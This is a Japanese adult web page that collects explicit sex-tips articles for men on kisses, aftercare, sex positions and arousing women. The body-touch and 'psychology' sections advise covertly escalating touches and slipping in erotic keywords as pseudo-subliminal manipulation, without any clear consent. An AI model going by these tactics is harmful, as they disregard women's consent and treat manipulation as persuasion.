SEXテクニック

様々な気持ちをこめたキスの種類

好きな人や愛する人ができたとき、人はキスをしたくなりますよね。

それは一つの愛情表現でもあり、キスをすることでさらに愛しさを増していきます。

しかしキスといっても実はいろんな種類のキスがあり、それぞれに意味があるのですがご存知でしたでしょうか。

いろんなキスを使い分けることにより相手へのメッセージともなりますし、種類を知ることはキスの達人に近づくといっても過言ではありません。

ではそんな沢山ある種類の中から厳選したキスのやり方や意味合い、注意点もそえて幾つか種介していきます。

軽い挨拶にライトキス



ごく一般的なキスでもあり、沢山の方がやっているキスがこのライトキスというものです。

名前の通りで軽いキスのことなのですが、軽く一瞬だけ唇を触れさせるくらいのものであり、愛情表現も含みますが挨拶の意味でも使います。

海外のドラマを見ていると出会ったらとりあえずライトキスをしていますよね。

「久しぶりだね」「元気だった?」といった意味を込めてしています。

ですのでライトキスは友人や家族の間でも行われますし、場所は唇だけではなく頬やおでこなどなどでも良いのです。

ただこの挨拶代りのライトキスは日本の文化には浸透していないものなので、むやみやたらとしてしまうと変な人扱いされるかもしれませんので気を付けましょう。

愛しさを表すバードキス

こちらは鳥のようなキスということでバードキスといわれるものです。

じゃれあっている鳥や餌を食べている姿を見ると解りやすいと思いますが、くちばしで軽くつついていますよね。

そのような唇で軽く何度も突っつくようなキスなのです。

このバードキスは興奮度が上がるキスとなりますのでカップルが多用するキスの一つとなります。

ずっと会いたいと思っていた、会えて良かったという気持ちを表すキスで嬉しさの表現ともいえるでしょう。

まさにじゃれ合いの始まりのようなキスです。

このキスはお互いがつつき合うと衝撃が強くなって怪我するかもしれないので、片方がバードキスをしてる時には相手の方はそれを受ける姿勢でいましょう。

性感を刺激するスライドキス

こちらはスライドする、つまり滑らせるキスということです。

お互いの唇を触れさせてゆっくりと左右に滑らせるように行うという、シンプルでありながら気持ちの良いキスとなります。

このスライドキスまできますと、唇は一つの性感帯であるということが実感できますので、とても感じてしまうこともあるでしょう。

これからもっとハードなキスへの序章ともいえるかもしれません。

しかしこのスライドキスはお互いがリラックスをして唇の力が入っていない状態でないと気持ちいいものではなくなってしまいます。

落ち着いてゆっくりできるような環境の場所で行うことをお勧めします。

二度おいしいチョコレートキス



さて、ここで一つオプションアイテムを使ったチョコレートキスの紹介です。

チョコレートキスなんてなかなか耳にすることもないと思いますが、実際にはやったことある方も多いのではないでしょうか。

それはお互いが口の中にチョコレートを含んだ状態でその相手のチョコレートを味わっているという、ちょっとお熱いキスの一つです。

昔にポッキーゲームなんてはやりましたが、それの延長戦のような感じですね。

ポッキーゲームの場合は延長が行われる地点でゲームとは言えなくなりますが。

チョコレートの美味しさも味わいながら相手の唇で気持ちよくなれてしまう、まさに二度の美味しさを味わえるキスと言えるでしょう。

まさにあまーいキスともいえるものですが、もし相手の女性がダイエットしているということになると拒否されることもありますので、その辺はしっかり探っておきましょう。

キスの代表ディープキス



キスと言えばやはりこのイメージが一番強いと言われると思います、ディープキスです。

お互いの口の中に舌を入れ合って、口の中で舌を絡ませ合ったり舐めあったりすることにより気持ちを高ぶらせるものですね。

愛し合ってる者同士なら確実にしているといっても良いくらいの、いわゆるメジャーなキスですよね。

そしてこのキスをすることによりお互いの興奮が絶頂に達して、これからセックスをしますというプロローグ的なキスともいえるでしょう。

しかしこのディープキスをする際に気を付けなければならないのは興奮しすぎて強引になりすぎることです。

そうなってしまうと相手の方は気持ちよさよりも先に苦しさを味わってしまうことになり、単なる自己満で終わってしまいますので注意が必要です。

アダルティッシュなカクテルキス

カクテルキスというのも馴染みがない方も多いのではないでしょうか。

これはバーなどでカクテルを飲んでいるときに、それを味わうための舌遣いや唇の動きがヒントとなっているキスになります。

口を開けた状態で相手の舌を優しく舐めたり時に甘噛みしてみたり、放してみてはまた舌を吸ってみたりと上品かつ興奮してしまう大人のキスと言えるでしょう。

こちらもディープキスと同様にそのあとの行動への誘いとも取れますので、ひとつのセックスアピールとも言えます。

もし本当に気のない相手であれば早めのお断りの準備をしておいたほうがよいでしょう。

もっと情熱的にインサートキス



インサートキスとはディープキスの進化形ともいえるキスのことです。

お互いが唇を合わせて、片方が舌を相手の口の中に入れ、次はもう片方が相手の口に中に舌を入れるという出し入れを楽しむキスのことなのです。

舌を入れられている側はその舌を優しく受け入れて絡ませたり包んであげたりして、お互いがお互いを受け入れているという実感を味わえます。

しかしこのキスはわりと体力も使いますので、あまり長い時間は控えておいたほうが良いと言えるでしょう。

リッププレイのニプルキス


こちらは上級編ともいえるキスで、ニプルキスというものです。

このキスは相手の唇を自分の舌でなぞるように這わせていくもので、唇で感じてもらう意図もあるリッププレイといっても良いでしょう。

そのなぞり方にも緩急をつけて、時に優しくそして時には激しく強く行うことにより相手に動きを予想させないことがコツとも言えます。

予想外のなぞられ方をされることにより唇の感度が上がっていき、やられている側は興奮状態に持っていかれることでしょう。

唇でもイカせるくらいの気持ちでやるのも情熱的で良いです。

支配的なスロートキス

スロートキスとはいわゆる吸うキスということです。

唇を合わせて相手が舌を出してきたらそれ自分の唇でつかみ、そしてとにかく吸いまくりますのでとても強引でありドエス的なキスといっても良いでしょう。

このキスには吸うことによって「もう貴女を離さない、僕のものだ」という支配欲を表していますので、それを伝えることにより相手は喜びも感じることができます。

しかし吸いすぎると相手の舌がしびれてしまいますので、くれぐれも吸いすぎには注意が必要です。

まとめ

数あるキスの種類の中からいくつか取り上げてきました。

挨拶代りから情熱的なものまで色んな意味を持つキスがありますので、その意味を理解してキスで会話をするような感覚も素敵なものですね。

いろんな種類があっても共通することは愛の表れということですので、注意点を守ってお互いが気持ちよくなれるようなハッピーなキスをしていきましょう。

女性が心の中で後戯で求めている事5選

セックスは前戯が大切!という事は多くの方が知っているのではないかと思います。

しかし、女性が心に秘める思いの多くが後戯に潜んでいる事にはなかなか気付けないものではないでしょうか。

セックス後のケアの重要さや女性の抱えている思いをいくつかお話したいと思います。

もっと触れていて欲しい



セックスで絶頂を迎え射精した後男性は、寝たりタバコを吸ったりとパートナーをしょんぼりさせる行動をしていませんか?

セックステクニックとして行為中だけではなく行為後のケアも忘れてはいけないものなのです

貴方とのセックスが終わった後も、パートナーにはまだ余韻が残っているため、終わってすぐに体が離れる事で「もう少しこのまま側に居て欲しいな」「何だか放ったらかしみたいで辛いな」と寂しく感じたりします。

また、女性の中には「え。するだけシたら終わり?淡白過ぎない?」と一気に愛情が冷めてしまうタイプも少なくありません。

セックスの余韻に浸りたいと多くの女性は思うもので、貴方のさりげないコミュニケーションで安心したり「愛されている」と感じるものです。

例えば、セックス後に髪をなでて軽く額にキスをしたり、ギュッと抱きしめて腕枕などをしたりと触れあう時間を増やしてみてはどうでしょうか。

パートナーはセックス後も大切に扱われたいと思っているため、優しく触れてもらえる事で満足できるのです。

甘いピロートークをしたい

行為に夢中で激しく求めた後は、どうしても眠たくなってしまうもので、セックス後に眠ってしまう方も男性もいらっしゃると思います。

パートナーは、セックス中だけではなく後戯でも貴方の愛情を確認したいため、会話がない無音な時間に不安を感じる事があり、「声を聞きたい!話をしたい」と思っているのです。

男性の中には「気持ち良かった?」「激しくしたら悦んでたよね?」等と相手女性に聞いてしまう方もいらっしゃいますが、実はパートナーは辱しめられるような声かけはあまり良く思わない事があるため、イヤらしい声かけは避けた方が良いでしょう。

例えば寄り添い合ったままで、次のデートはどこに行きたいか等と次の約束や貴方が考えたプラン等を話してみる事も良いと思いますし、パートナーが話をしているならばしっかりと聞いてあげて共感してあげて下さい。

パートナーはセックス後の会話を大切にしたいと思うもので「好きだよ」「私も大好き」等と甘いピロートークを夢見ているもので、話の終わりや途中などに甘く囁き合いたいと心の中で思っているものなのです。

寄り添い合って会話する事で、体だけではなく心から大切にされている事で満たされた気分になれたり、貴方と愛を確かめ合う事で二人の時間をより特別に感じる事でしょう。

一緒にお風呂でイチャイチャしたい



激しく求め合った後、多くのカップルはシャワーやお風呂に入りに行くと思います。

俺、シャワー浴びて来るわ」とセックス後に普通にベッドから出て浴室に向かう男性も少なからずいらっしゃるのではないでしょうか?

そこでパートナーの存在を大切に考えてあげる事こそが重要なポイントになって来ます。

パートナーは、余韻が残ったままであるため、もっとイチャイチャしていたいと求めているため、一人で残される事に寂しさを感じています。

例えば「一緒にお風呂入ろっか!」と誘い、お風呂の中での甘い一時や、体の洗い合い等してみてはいかがでしょうか。

激しく求め合った後の優しい触れ合いにより、パートナーは心から満たされていき「この先もこんな風にラブラブでいたいな」と貴方との未来を想像して幸せな気持ちになるのです。

パートナーの存在を大切に考えてあげる事で、貴方のセックステクニックが上がるとも言えるため、「行為が終わったら満足しているだろう」と考える事は避けるよう意識してバスタイムを上手く活用してみてはどうでしょうか。

さりげない気配りに期待している

行為の後シャワーに行ったりタバコを吸ったりとバタバタしたり、あるいはパワーを使いきってしまい眠ってしまう事もあるのではないでしょうか。

まだまだイチャイチャしていたいとパートナーは後戯を求めているため、貴方の行動の一つ一つに敏感に反応しているものなのです。

パートナーは激しい行為の後の優しさを心の中で求めているため、貴方との愛を改めて確かめ合うための大切な時間が欲しいと感じています

側に寄り添うだけでも女性は幸せな気持ちになりますが、もっと女性が愛されていると感じる事をしてみてはどうでしょうか。

例えば、セックス後すっとベッドから出たと見せかけて、汗をかいているパートナーにさりげなく「はい!汗かいて喉カラカラでしょ?」と飲み物をあげてみて下さい。

セックスの激しさの後、貴方からの優しさを心の中で求めているパートナーは甘い雰囲気に再び酔い始めるでしょう。

この時「一緒に」というフレーズを入れる事が重要なポイントで、女性に貴方の優しさがちゃんと伝わり安いワードでも有るため、口下手な男性の方にもオススメの声かけです。

また、行為後にそっとティッシュで付き合っていても男性の前で堂々と拭けない陰部を拭いてあげる事も紳士的な気配りの一つではないでしょうか。

アフターケアを意識して欲しい



ここまで様々な後戯についてお話してきましたが、そもそも後戯を意識した事がない方や、パートナー自体が淡白なタイプが多いというケースも珍しくはないと思います。

そのため前戯や行為のテクニックは知っていても「後戯って何?どうしたらいいの?」と考えてしまう方もいらっしゃるのではないでしょうか。

そういった男性がいる事も少なからずパートナーは知っていますが、「沢山気持ち良くしてもらったのに、これ以上ワガママ言えないよ」と思いながらも「でも、少しでも良いから気づいて欲しいな」と内心では貴方に後戯を意識して欲しいと感じているのです。

後戯は難しく考える必要がなく、ありのままの貴方の優しさでパートナーを包み込んであげる事がポイントになり、女性に心から安心し満足してもらうための第二のセックスタイムとも言えます。

燃え上がるようなセックスの後、まだ敏感なパートナーに優しく大切に接する事を意識してみて下さい。

例えば「体、大丈夫?」と腰をマッサージしたり、いきなりするより「足辛くない?マッサージしようか?」と尋ねたりしながら、貴方なりの優しさでパートナーと接してみてはどうでしょうか。

自然に振る舞っているつもりでも顔が赤くなっていたり、後戯を意識して頑張っている貴方を見てパートナーは「嬉しい」「愛おしい」と素直に心から思っています

まとめ

女性の心の中にある後戯への思いは、体だけではなく心まで満たされたいという「心への愛撫」なのです。

心から満たされたいと言うパートナーの気持ちに貴方が寄り添ってあげる事で、女性はより輝き魅力的になれるのでしょう。

女心を理解し、二人の愛が深まる参考にしてみて下さい。

絶対成功する6つのキスのやり方

女性とある程度親しくなれば、キスをしたいと思ってもおかしくはありません。

しかし、やはりキスをするならば失敗はしたくないですよね。

例えばタイミングを逃してしまった、キスをしようとしたら女性に嫌がられてしまった、などという失態は犯したくないと思うこともあるでしょう。

また、付き合っていない仲であればキスはなかなかハードルが高くなります。

もしも既に付き合っていてファーストキスがまだ、という状態ならば、相手に嫌がられてしまうという事はないでしょう。

しかし、もしもまだ付き合っていないという状態ならば、キスをしようとすると嫌がられてしまうという可能性も考えられるのです。

絶対成功させるためには、どのようにキスしたら良いのでしょうか。

また、絶対にキスするためにはどんな事にポイントを置いて確認したら良いのでしょうか。

ここでは、絶対に成功するキスのポイントを紹介します。

相手が自分に好意があるということを確認する



相手にキスをしたいと思うのであれば、まず相手には自分に対する好意がなければいけません。

どれだけ仲が良かったとしても、どれだけ両想いに見えたとしても、確かに相手には自分に対する行為があると自覚できなければ、キスには失敗する可能性があります。

そのため、キスをしたいと思うならば相手の気持ちを最初に確認しておきましょう。

もちろん、ロマンチックな空気になったから敢えて確認するような必要はない、むしろ言葉に出して確認なんかしたら空気が壊れる、という場合もあるかもしれません。

しかし、相手の気持ちがわからない、もしかしたら相手は自分のことを好きではないかもしれないなどという自覚があるならば、キスを仕掛けるのは危険かもしれません。

相手が嫌がらずにキスされてくれるためには、やはりお互いに好意を持っていなければいけません。

そのため、相手にキスをしたいと思うのであれば、相手の気持ちを最初に確認しておきましょう。相手が確かに自分に好意を持っているという自信があってこそ、キスを仕掛けることが可能になります。

100%の女性が壁ドンを望んでいるわけではない



かつて、壁ドンという言葉が流行りましたよね。

女性は受け身であることが多いため、男性から壁ドンをされて、そこから告白されたりキスをされたり、強気な言葉を投げかけられたりということに憧れている、というイメージからきたものです。

そのため、女性をハグしたりキスしたりという時に壁ドンをしたら女性は喜ぶのではないか、壁ドンしたら女性はそれに応えてくれるのではないか、というイメージを持つ男性が非常に多いのです。

確かに、女性が壁ドンを望んでいるならば、ぜひやってみたいと思う人もいるかもしれません。

しかし、これには注意が必要です。

女性はみんながみんな、壁ドンを望んでいるわけではありません。

受け身の女性であれば確かに壁ドンを喜ぶかもしれません。

しかし、受け身ではない女性の場合、壁ドンをされたら嫌がる可能性も高いのです。

嫌がられるだけならともかく、恐怖心を与えてしまったり、逆に威圧感を与えてしまい、嫌われてしまう可能性もあります。

そのため、キスをするシチュエーションとして壁ドンはおすすめできません。

確かに、テレビ番組などを見ていると壁ドンをしてキスをしたら女性は誰もが喜びそうな気持ちになるかもしれません。

しかし、壁ドンを嫌がる女性にこれをしてしまえば、一気に嫌われてしまう可能性があります。

また、壁ドンを嫌がるかどうかはやってみなければわからない場合もありますし、女性のことをよく知っているならば、彼女の性格から、壁ドンを好んでいるかどうか把握することもできます。

キスの前には見つめあう



キスをしたいと思うのであれば、まず見つめあう時間が大切です。

お互いに見つめあってうっとりする時間があれば、キスは成功する可能性が高いと言えるでしょう。

しかし、自分が相手を見つめていても相手が自分を見つめてくれない場合、キスは成功しない可能性があります。

お互いにハグをしていたり、目が合ってうっとりと見つめあったりすれば、十分に気持ちが伝わっているといえます。

しかし、自分は彼女の目を見落としているのに彼女は自分の目を避けている、彼女が明らかに自分を見ようとしていないなどという場合、彼女にはキスをする気がないかもしれません。

キスというのは女性にとっても一大事であり、ロマンチックな出来事です。

そのため、女性もキスをするならばロマンチックな瞬間にしたいと思っています。

その一方で、女性があなたの方を見てくれない、女性があなたの目を避けているという場合であれば、どれだけハグをしたとしてもキスは成功しないかもしれないのです。

キスをしたい、もしかしたらキスができるタイミングかもしれないと思ったら、目が合うかどうかを確認しましょう。

お互いに目が合う、目を合わせたまま無言の時間が長い、などという場合はキスをする絶好のチャンスと言えるのです。

ハグをする

キスを成功させるためには、下準備が大切です。

その代表的な下準備として、ぜひ女性をハグしてみましょう。

ハグをする、ハグができるという事は、女性もあなたに好意を持っているという証拠です。

あなたに好意を持っているという事は、キスをさせてくれる可能性が高まります。

また、ハグをしていた方がキスをしやすいということもいえます。

ただその場で向き合ってキスをすると、タイミングがわなかったり、お互い違うことを考えていたりと、キスが成功しない可能性もあります。

その一方でハグをしていれば、お互いの動きが限られますから、キスが成功する可能性が高くなるのです。

また、タイミング的にもハグができた後でキスをした方が良いでしょう。

女性の場合、物事の順番を重視する人もいます。

最初に付き合って、手をつなぎ、ハグをしてからキスをしたいと考える女性は少なくありません。

その順番を変えてしまうより、このような純粋な順番に従った方が女性は抵抗なくキスを受け入れてくれるのです。

そのため、初めてキスをする場合は先にハグをしておきましょう。

手をつなぐこともなく、ハグすることもなく、いきなりキスをしようとしても、失敗する可能性が高まります。

キスをするなら薄暗い場所が良い



キスをするのであれば明るい場所よりも薄暗い場所の方が良いと言われています。

明るい場所だと、お互いに照れてしまったりお互いに恥ずかしさを隠し切れないということがあります。

その一方で薄暗い場所であれば、ムードが高まると言われているのです。

キスをするときの顔は恥ずかしくて見せられない、ということもあるでしょう。

特に女性の場合は、相手からじーっと顔見られると恥ずかしいという意識を持つことがありますから、薄暗い場所の方が良いと思う人もいるものです。

また、薄暗い場所の方がロマンチックな気分になったり、大人の気分が味わえたりなど、利点があります。

ただし、あまり暗くなってしまうと女性が警戒心を抱く場合もありますから、あまり暗すぎない方が良いでしょう。

最初は軽いキスから

初めてその女性にキスをするならば、軽いキスからはじめましょう。

最初は唇が触れるようなキスの方が、女性にとっても警戒しなくてすみます。

最初から舌を使うようなキスに移行してしまうと、場合によっては驚かせてしまう可能性があるからです。

女性の中には、先ほども述べた通り段階を重視する人もいます。

最初は唇をついばむようなキスが良い、だんだんと情熱的なキスができるようになりたいなど、段階が大事だと思っている人は決して少なくは無いのです。

最初から情熱的なキスをしてしまうと、なんとなく後から物足りないような気持ちになってしまったり、軽い気持ちでキスをされているような気持ちになってしまったりして、相手への不信感が生まれてしまう場合さえあるのです。

女性にとってムードは大切ですから、順番は尊重しなければなりません。

そのため、その女性に初めてキスをするならば軽いキスから始めるようにしましょう。

もちろん人によって好みの基礎違いますから、相手に応じて変えていく臨機応変さが重要です。

【まとめ】

いかがでしょうか。

女性にキスをするときには女性が喜ぶようなキスをしなければいけません。

成功させるかどうかも大切ですが、女性の気持ちを重視したキスをすることが大切です。

また、その後を連想させるようなキスも重要ですが、スピードが早すぎたりして女性を警戒させることのないようにしなければいけません。

キスは決して終わりではなく、むしろ始まりですから、その後の関係も尊重し、お互いに満足できるキスができると良いですね。

女性のマンコを濡ぬれまくってしまうボディタッチの方法10選

女性も、セックスしたい、男性とエッチなことをしたいという願望は強く持っているものです。

しかし、なかなかそれを自分から言い出せずにいることが多いのです。

セックスをする時に、マンコが濡れていれば、より気持ち良くなることができますし、女性も気持ちよくすることができ、そうなれば、その女性はあなたの虜になってしまうものです。

そのためには、セックスにいくまでに上手にマンコを濡らしてあげることが大切になってきます。

マンコが濡れてくれば、自然とセックスがしたくなりますし、興奮が抑えられなくなるので、後は思いのままに楽しむことができるようになります。

そのための、マンコを濡れさせるボディタッチの方法を考えていきます。

さりげなく手を触る

 

・話をしながら手を握る



どんなに親しくても、会話をしながらボディタッチを入れていくことが何よりも重要なことになってきます。

世間話や少しエッチな会話を楽しめるようになってきたら、さり気なく相手の手を触ります。

その時に大事なのは、手をグッと握るのではなく、テーブルの上に置いた手に手を重ねたり、「指が綺麗だね」と言いながら優しく触ることが大切になってきます。

優しく触ることで、女性はドキドキして、その優しさに体が反応してマンコもうずいてくるのです。

あくまでも優しく触る事で、女性の警戒心を解いて、気になるのだということとと、優しく扱うよという気持ちを感じさせることが大切になってきます。

手をさする

手を重ねれば、当然、そのまま離してはいけません。

そのまま優しく手をさするのです。

指や手を褒めながら片手で女性の手を撫でて、煽てます。

褒められて嬉しくない女性はいないので、綺麗だと言いながら、両手を添えるようにするのです。

両手で相手の手を挟み込んで、その感触が柔らかかったり、スベスベしていることを伝えながら優しく手のひらも触ります。

優しいタッチで手を触ることでゾクゾクした感覚を女性に与えることで感じやすい体にすることができます。

上半身から攻める

肩に手を回す



女性のマンコを濡れさせるために大切なのは、ドキドキさせることです。

そのために女性の体に自分の肩を寄せ、さりげなく肩を抱きかかえます。

肩に手を回すことで、自分の方へ女性を近づけます。

それも力強く行うのではなく、優しく二の腕を抱くように自分に寄り添わせます。

それが女性にとってドキドキするポイントでありますので、そういった気持ちを持たすことができれば女性の性的欲求も高まっていきマンコも濡れてくるのです。

女性の肩を寄せる時に、さり気なくできれば、よりドキドキさせることができます。

大事なのは、自然体でそっと触れるように肩を抱くことです。

初めて肌が触れ合ったり、近づくときには、男女を問わずに興奮しますので、優しく抱いてあげることが大切になってきます。

撫でるように肩から腕へ

肩を上手く抱くことが出来たら、そのまま二の腕に手を回します。

二の腕は、脇や胸に近い場所ですから、優しくさすってあげることで、気持ち良くなり、興奮するものです。

あくまで撫でるようにして、触ってあげることが大切です。

女性は、優しくされることで興奮するものですから、優しいタッチで体を触ってあげることで、興奮を高めることができます。

女性の興奮が高まれば、自然とマンコが濡れてきて、トロっとした顔つきになってきますので、その顔をみれば、気持ち良くなっていることがわかり、上手く持っていくことでどんどん濡れさせることができるのです。

腰へ手を回す

腕から脇の方に手を持っていき、ゆっくりと横腹から腰へと手を移動させていきます。

腰まで手を持っていければ、腰やお尻の辺りをゆっくりと撫でるように触ります。

こういった優しいボディタッチで、遠くから少しずつマンコに近いところへとタッチを繰り返していくことで、興奮していきますので、女性のマンコも濡れてくるのです。

大事なことは、焦ってはいけないということです。

あまりに早く手を移動させると、触りたいだけと思われますので、女性が気持ち良くなるように優しくゆっくりとボディタッチを繰り返していくことが重要です。

服の上から

 

・胸を優しく撫でる



女性を感じさせて濡れさせるのに最も有効なのは、胸を触ってあげることです。

これができる関係であれば、後はどれだけ感じさせることができるかになってきますが、 男性にとって憧れの柔らかい胸ですが、欲望のままに力強く握ったりしてはいけません。

女性が感じるのは、柔らかいタッチ、優しいタッチによるものなので、胸を触るときも優しく触り、服の上からそっと触るようにすれば、女性は気持ちよくなり濡れてきますし、顔がとろんとするので、感じているのが分かるはずです。

あくまで、優しいタッチで胸を撫でるようにすることが大切です。

 

・乳首を優しく


女性を濡れさせるのに、乳首を触ることは重要なポイントです。

服の上からでも、胸を撫でて、ゆっくりと中心部分に近づいていきます。

そして、指の腹で優しく乳首を愛撫するように撫でてあげます。

こういった風に、少しずつ核心に近づいていくことで、女性はどんどん感じていきますから、マンコも自然と濡れてくるのです。

足を触る

膝から太腿へ

足を責めることも、女性を興奮させて感じさせるには重要なポイントになってきます。

横に座って話をしていれば、話の流れで何気なく女性の膝に手を置くことはできますから、そのままゆっくりと太腿に手をずらしていきます。

そして、太腿が「柔らかいね」、「白いね」といって褒めながらさするようにするのです。

この褒める言葉とソフトタッチがあれば、気持ち良くなってくるのは間違いないですから、女性の顔つきを観察して、感じていることを実感するようにします。

腿の外側を

太腿に手をおいて、女性が気持ち良さそうな反応を見せれば、そのまま外側の太腿にも手を伸ばしていきます。

外側に手を回すことで、腰の方に手をずらしていけば、お尻の辺りに手を回すことができます。

女性が感じるのも男性と一緒で、マンコに近いほど、ドキドキしますし、興奮しますから、太腿の外側を触り、お尻の近くまで優しく触ってあげることで、女性を感じさせて、マンコを濡らすことができるのです。

内ももを優しく



外腿を触って、喜んでいるようであれば、最後の場所として、内ももに手を伸ばします。

女性も、内ももは、人には触られることがない場所ですから、触られることで興奮を覚えます。

女性にぞくぞくする感覚を味わわせることができる場所が、内腿になりますので、横に座り、さりげなく手を回していくことが女性のマンコを濡れさせるために、重要な触り方です。

優しく撫でるように内腿を遠いところから付け根に近いところへ沿わすように触ってあげれば、女性は興奮し、マンコも濡れてくるのです。

あくまでも優しく、ゆっくりと触ることが女性を感じさせるのに大切なことになってきます。

まとめ

女性のマンコを濡れさせるために大事なボディタッチの方法としては、常に優しく、ソフトタッチで触れることが重要です。

沢山女性に触れたくてせわしなく手を動かしてしまっては、女性を感じさせることはできません。

マンコを濡れまくるようにするには、あくまで焦らすようなソフトタッチでゆっくりと優しく色んな場所を触ってあげることが大切になってくるのです。

女性が好きな体位ランキングTOP5!

みなさんは普段する自分のエッチに自信はありますか?

彼女はいつも気持ちよさそうだから大丈夫!」とか「下手なわけがない」など思っていても実は「痛いだけ」「あんまり気持ちよくない」なんて思われていることもあるかもしれません。

アダルトビデオの通りにやれば気持ちよくなってくれると考えているのならそれは間違いです。

そのような浅はかな考えは今日でさよなら!

今回は、女性が「本当はこうして欲しい!」「この体位が好き!」など女性を満たすことができる体位を詳しくお話していきたいと思います。

女性が本当に喜ぶエッチを知り、エッチが上手くなれば、彼女が自ら求めて来ることもあるかもしれないですよ?

女性はエッチになにを求めているのか?

そもそも、女性はエッチに対してなにを求めているのか。

それは、「満足感」です。

「大好きな人と繋がれている」「こんな気持ちいいエッチは初めて」など、心と体を満足感でいっぱいにさせることが女性がエッチに求めているものでしょう。

たしかに、エッチではテクニックなども大事かもしれませんが、女性の心を満たしてあげることがもっとも重要です。

男性は体でエッチをしますが、女性は脳でエッチをすると言われています。

快感よりも気持ちの面の方が強いので、女性の心を満たせるエッチが出来れば、パートナーともより良い関係を築くことができるかもしれません。

女性が好きな体位とは?

根本的なお話ですが、女性が好きな体位とはなんなんだという疑問もあると思います。

たくさんの体位がある中でどの体位が好きなのかは人それぞれなので、相手がどんな体位が好きなのかを見極めることはとても重要です。

せっかくエッチしているのだから、気持ちよくしてあげたい!」という男のプライドをかけた気持ちは間違いなく素晴らしい心がけです。

しかし、せっかくそんな素晴らしい心がけを持っているのに、それがあだになり、「痛いだけ」「気持ちよくない」「早く終わらないかな」なんて思われてしまっては悲しすぎます。

相手を満足させてあげたい!」という気持ちを成就させるために、一つずつ勉強していきましょう。

【第1位】正常位



色々な体位がありますが、圧倒的に人気なのは正常位です。

お互いの顔も見える上に、足を閉じたり工夫することで挿入感が変わります。

中でも人気なのは、抱き合いながらの正常位です。

この体位は抱き合っている上に快感もあるため、心と体の両方を満たすことができます。

他にも、腰を持ち上げることでより奥に挿入することもできるので、奥が好きという女性には最適です。

持ち上げるのが大変という人は女性の腰の下に枕を奥のもおすすめです。

一番幸せな体位は正常位」とまで言われている上に、たくさんの応用が効く正常位を極めることは床上手と呼ばれるための第一歩になるでしょう。

【第2位】バック(後背位)



バックは一番奥に当たりやすい体位で、身体的に一番感じるのはバックと言われています。

しかし、奥まで当たる分痛がる女性もいるので優しく相手の反応を見ながらするようにしましょう。

バックをしている時に両手を休めている人もいますが、せっかく空いているのですから相手の乳首とクリトリスも同時に刺激してあげましょう。

こうすることで、バックでの感度がアップします。

また、相手の背中を反らせることで、Gスポットを通過して奥まで当たるので、ぜひ試して見てください。

【第3位】対面座位



意外に思われた方もいるかもしれませんが、相手と向かい合いながらする対面座位は意外と人気なのです。

対面座位は案外奥まで挿入できる上に、お互いの顔も見えるため女性は満足感を得やすいのです。

男性は動かせる範囲が制限されるので突き上げるのは難しいので、お尻を下に落とすイメージで動きましょう。

そうすると、女性の体も一緒に落ちてくるので結果的に出し入れができている状態になるはずです。

慣れないうちは動きづらいかもしれませんが、その分ピンポイントで奥を優しく突くことができるので、試してみる価値はあると思います。

*補足ですが、女性の膣の奥は開発されていなければ痛みを感じることがあるので女性が求めて来ない限りは優しく突いてあげるのがベターです。

【第4位】騎乗位



騎乗位は、S気質の女性に好きな人が多く、自分が責めていることに満足感を得て快感を得ているようです。

しかし、騎乗位で上手く動ける女性はごくわずかです。

大体の女性は体力的にも難しいので、男性側から動いてあげるのも良いでしょう。

また、女性の腰を掴んで挿入したまま奥を擦り付けるようにするのも、お互いの体力を温存できるのでおすすめです。

【第5位】側位



この体位は動くのが少し難しいので上級者向けではありますが、側位はGスポットをピンポイントで責めることができるので、側位が上手になれば女性をイかせることもできるはずです。

まずはどこがGスポットなのかを探るために、相手の反応をよく観察することが大切です。

見つけるのが難しい場合はどこがいいのか聞いてしまうのも一つの手です。

下手と思われたらどうしよう」と思う方もいますが、聞いてしまえばどこが気持ちいいかも聞ける上に話すことでのコミュニケーションも取れるのでマンネリを防ぐことができます。

またこの時にも片手で乳首を刺激したり、クリトリスを刺激してあげましょう。

基本的には、手が空いたらどこかを刺激してあげるというのが鉄則です。

もし上手くできなかった時はどうすれば?



自分なりに頑張ってみたけどあまり満足してもらえなかった」という時もあるかもしれません。

女性の体調によっても感度は変わってくるので全部自分が悪いとも言いにくいです。

もし、上手くいかなかった時に挽回するチャンスがあるのは、終わった後の「後戯」です。

もし上手くいかなかった時は後戯を大切にしましょう。

相手より先に寝たり、終わったらすぐスマホいじったりタバコ吸ったりすると、女性は満足どころか「私は体目的だったのかな…」と思ってしまいます。

終わった後は、楽しくおしゃべりしたり暖かく接するようにしましょう。

「後戯を制すものはSEXを制す」です。

終わりに

いかがでしたでしょうか?

「体位」というものだけで考えれば単純ですが、一つの体位でも動き方を変えるだけで違った責め方をすることができます。

エッチに対して貪欲であることは決して恥ずかしいことではありません。

アダルトビデオのまねをした結果エッチが嫌いになってしまう女性も少なくありません。

パートナーを満足させたいからという理由で勉強をすることに恥ずかしいことは一つもないはずです。

女をエロい気分にさせまくる7つの心理学

女性の気持ちが分からない」「いま、何を思っているのだろう」などと不安に感じたり、 「どんな風に誘ったらHしてくれるのか」「Hな事に対して、どんな風に考えているのだろう」などと悶々と様々な事を考えている男性の皆様はいらっしゃいませんか?

女性って下ネタに対して嫌悪感しかないのでは?などと、女性の事で悩む方。

どうしたら、もっとHしたいと言ってくれるのだろう?などと、より一層の快楽を求める方。

そんな皆様に女性をエロく、Hな気持ち・気分にさせる心理をご紹介させていただきます‼

会話にエロいキーワードを挟む



女性も全く同じ、という訳ではありませんが、恥ずかしい気持ちやHな事を言ったり思ったりしてるのってダメなのかな?と男性と似たような事を考えながら会話しています。

最初は女性の話す内容を聞きながら共感し話を進めて行きます。

例えば、女性の服装やセットされた髪型に目を配り、「(その髪型)好きだなぁ」「何だかすご く(服装・お化粧)大人っぽくてヤバいかも~」など、まず、相手女性をほめます。

ほめる事で、女性は細かいところに気づいてくれている男性を信頼するようになります。

そこで効果的なのが、誰もが持つ潜在意識(心理学的に言うと、サブリミナル効果)に対して エロいキーワードを繰り返し挟んでいくことです。

食事などでは、この玉子いい感じに半熟だよな!ではなくて、「うわっ!この玉子トロっトロすっげウマイ」とか、丼ものの時とかに「つゆだくが良いな」といった、普通なのに、な ぜかエロく聞こえてしまうワードです。

他にも、「熱中症をゆ~っくり言って?(ねっ​ ​ ちゅう​ ​ しよう)」や「ラブホテルを10回言っ て?(言わせてから)何回言った?(イった)」など笑いを絡めて使うと、より効果的でしょ う。

男性から「コレ(飴・アイスクリームなど)、舐める?舐めない?」や「スキーとスケート どっちにイきたい?」など「うん」「はーい」で終わらせないように気をつけて試してみて 下さい。

